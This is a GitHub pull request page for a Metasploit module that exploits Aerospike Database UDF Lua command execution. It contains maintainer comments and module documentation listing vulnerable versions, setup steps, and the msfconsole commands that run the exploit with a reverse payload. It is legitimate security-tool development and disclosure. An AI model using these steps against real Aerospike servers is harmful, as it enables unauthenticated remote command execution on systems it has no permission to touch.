New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add Aerospike Database UDF Lua Code Execution exploit #14466
Add Aerospike Database UDF Lua Code Execution exploit #14466
Conversation
FYI @b4ny4n |
Looks good! @bcoles - Just one note on the description: the vulnerability was in allowing io.popen calls. |
Both |
Interesting - on 4.9.0.5 I was unable to get os.execute to fire - I'll revisit - thanks! |
The module works on your 4.9.0.5 docker image. I didn't bother to investigate why, but my guess is that your Python exploit defines a proper function, where as I shoved As it happens, I found your exploit on exploit-db before looking at your writeup or GitHub. The example Lua code Edit: test on the docker image:
|
Yeah, that's really interesting! There must have been partial checks based on assumptions related to the UDF registering... I really like this approach as it doesn't need any of the dependencies, etc. Care if I link to it in my post? |
Not at all. Go for it. I guess there's some useful context in this thread if you or someone else wants to investigate further. This module took longer to develop than anticipated, largely due to developing reliable cleanup (as per code comments) so I'm kinda over it, but there's certainly more areas for investigation. For reference, here's the result of testing on a patched version:
|
Tested successfully against versions
|
Release NotesNew module |
Vulnerable Application
Aerospike Database versions before 5.1.0.3 permitted
user-defined functions (UDF) to call the
os.execute
Lua function.
This module creates a UDF utilising this function to
execute arbitrary operating system commands with the
privileges of the user running the Aerospike service.
This module does not support authentication; however
Aerospike Database Community Edition does not enable
authentication by default.
This module has been tested successfully on Ubuntu
with Aerospike Database Community Edition versions
4.9.0.5, 4.9.0.11 and 5.0.0.10.
Verification Steps
Download a vulnerable version of Aerospike Database Community Edition from:
Decompress the compressed
.tgz
software installer archive file:Install:
Start the
aerospike
service:use exploit/linux/misc/aerospike_database_udf_cmd_exec
set RHOSTS [IP]
set target [target]
set payload [payload]
set LHOST [IP]
exploit
Options
UDF_DIRECTORY
Directory where Lua UDF files are stored (Default:
/opt/aerospike/usr/udf/lua/
)Scenarios
Aerospike Database Community Edition version 5.0.0.10 on Ubuntu 20.04 (x64)